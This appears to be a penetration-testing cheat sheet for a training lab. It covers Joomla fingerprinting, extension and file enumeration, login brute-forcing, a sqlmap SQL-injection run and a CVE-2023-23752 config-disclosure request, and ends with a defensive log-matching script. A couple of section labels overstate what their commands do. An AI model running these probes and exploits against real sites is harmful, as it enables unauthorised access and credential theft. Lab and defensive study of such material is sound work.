3.-Joomla-discovery-and-enumeration

1. Basic Joomla Identification

curl -s http://dev.inlanefreight.local/ | grep Joomla  # Check for Joomla in HTML source
curl -s http://dev.inlanefreight.local/robots.txt  # Check robots.txt for disallowed directories
curl -s http://dev.inlanefreight.local/README.txt  # Check for version information
curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml  # Detailed version info
curl -s http://dev.inlanefreight.local/plugins/system/cache/cache.xml  # Approximate version info
curl -I http://dev.inlanefreight.local/favicon.ico  # Check for Joomla default favicon

2. Joomla Version Enumeration

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool # Joomla usage stats API
curl -sI http://dev.inlanefreight.local/ | grep -i "X-Content-Encoded-By"  # Joomla HTTP headers for version info
curl -s http://dev.inlanefreight.local/CHANGELOG.php # Check for changelog

3. Automated Scanning

Droopescan

sudo pip3 install droopescan
droopescan -h
droopescan scan joomla --url http://dev.inlanefreight.local/

JoomlaScan (Python 2.7)

sudo python2.7 -m pip install urllib3 certifi bs4
python2.7 joomlascan.py -u http://dev.inlanefreight.local/

4. Joomla Login Brute-Force

sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

5. Extension Enumeration (Manual)

curl -s http://dev.inlanefreight.local/components/
curl -s http://dev.inlanefreight.local/modules/
curl -s http://dev.inlanefreight.local/plugins/
curl -s http://dev.inlanefreight.local/templates/
curl -s http://dev.inlanefreight.local/media/

Check for JavaScript or CSS files:

curl -s http://dev.inlanefreight.local/components/com_content/assets/js/content.js

6. Configuration File & Backup File Checks

curl -s http://dev.inlanefreight.local/configuration.php  # Check for configuration exposure
curl -s http://dev.inlanefreight.local/configuration.php.bak
curl -s http://dev.inlanefreight.local/backup.zip
curl -s http://dev.inlanefreight.local/joomla.sql

7. Directory & File Enumeration

dirb http://dev.inlanefreight.local /usr/share/wordlists/dirb/common.txt

8. Joomla REST API Enumeration (If Enabled)

curl -s http://dev.inlanefreight.local/api/index.php/v1/users

9. Joomla CLI (If Accessible)

joomla user:list

10. Exploiting Known Joomla Vulnerabilities

SQL Injection (CVE-2017-8917)

sqlmap -u "http://dev.inlanefreight.local/index.php?option=com_content&id=1" --dbs --batch

Unauthenticated Admin Takeover (CVE-2023-23752)

curl -X GET "http://dev.inlanefreight.local/api/index.php/v1/config/application?public=true"

11. Joomla User Enumeration

curl -X POST -d "username=admin" "http://dev.inlanefreight.local/index.php?option=com_users&view=reset"

12. Joomla Debug Mode & Log File Checks

curl -s http://dev.inlanefreight.local/logs/error.php  # Check for error logs
curl -s http://dev.inlanefreight.local/logs/debug.log  # Check for debug logs

13. Extracting Sensitive Data from Logs

grep -i "password" logs/error.php

14. Checking for Default Credentials

joomla user:list --filter super --output=json | jq '.[].username'

15. Important Considerations


  • Version Fingerprinting:

    • Accurate version identification is crucial for finding relevant exploits.

    • Combine multiple methods (README, joomla.xml, cache.xml) for accuracy.

  • Extension Enumeration:

    • Extensions are a common source of vulnerabilities.

    • Manually examine directories and file paths for clues.

    • Identify extension versions when possible.

  • Configuration File Exposure:

    • The configuration.php file contains sensitive database credentials.

    • Check for its presence and assess the risk of exposure.

  • Robots.txt:

    • Carefully analyze robots.txt for disallowed directories that might reveal sensitive information.

  • Joomla Rest API:

    • If enabled, the Joomla Rest API can expose sensitive data and functionalities.

    • Test for common vulnerabilities and misconfigurations.

  • Joomla CLI:

    • If you have shell access, the Joomla CLI can be used to gather information and manage the Joomla installation.

  • Vulnerability Databases:

    • Use resources like the Joomla Vulnerability Center or CVE databases to find known exploits.

    • Search for vulnerabilities related to the Joomla version and installed extensions.
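
A defender's view of the checklist above, as an added example that is not part of the original page: the script matches the paths requested in sections 1, 2, 6, 8, 10 and 12 against web-server access logs, flagging clients that probe several groups of paths and any probed path the server answered with 200. The Combined Log Format, the sample log lines and the threshold of three groups are assumptions made for this example.

```python
import re
from collections import defaultdict

# Request paths from the checklist above, grouped by what a hit would reveal.
PROBES = {
    "version": re.compile(r"^/(README\.txt|CHANGELOG\.php"
                          r"|administrator/manifests/files/joomla\.xml"
                          r"|plugins/system/cache/cache\.xml)$"),
    "backup": re.compile(r"^/(configuration\.php\.bak|backup\.zip|joomla\.sql)$"),
    "api": re.compile(r"^/api/index\.php/v1/(users|config/application)$"),
    "logs": re.compile(r"^/logs/(error\.php|debug\.log)$"),
}

# Combined Log Format (assumed): ip - - [ts] "METHOD target HTTP/x" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def analyse(lines, min_categories=3):
    """Return (scanners, exposed): client IPs that requested paths from at least
    min_categories probe groups, and (group, path) pairs answered with 200."""
    seen = defaultdict(set)
    exposed = set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not in the expected log format
        ip, _method, target, status = m.groups()
        path = target.split("?", 1)[0]  # signatures ignore the query string
        for category, pattern in PROBES.items():
            if pattern.match(path):
                seen[ip].add(category)
                if status == "200":
                    exposed.add((category, path))
    scanners = sorted(ip for ip, cats in seen.items() if len(cats) >= min_categories)
    return scanners, sorted(exposed)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [10/Mar/2025:10:00:01 +0000] "GET /README.txt HTTP/1.1" 200 4872 "-" "curl/8.5.0"',
    '203.0.113.7 - - [10/Mar/2025:10:00:02 +0000] "GET /administrator/manifests/files/joomla.xml HTTP/1.1" 200 1801 "-" "curl/8.5.0"',
    '203.0.113.7 - - [10/Mar/2025:10:00:03 +0000] "GET /configuration.php.bak HTTP/1.1" 404 196 "-" "curl/8.5.0"',
    '203.0.113.7 - - [10/Mar/2025:10:00:04 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 2210 "-" "curl/8.5.0"',
    '198.51.100.20 - - [10/Mar/2025:10:01:00 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [10/Mar/2025:10:01:05 +0000] "GET /README.txt HTTP/1.1" 200 4872 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    scanners, exposed = analyse(SAMPLE)
    print("likely enumeration from:", scanners)
    for category, path in exposed:
        print("answered with 200:", category, path)
```

Every entry in the second result is a file or endpoint to block or remove at the web server, whether or not a scanner has been seen requesting it.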
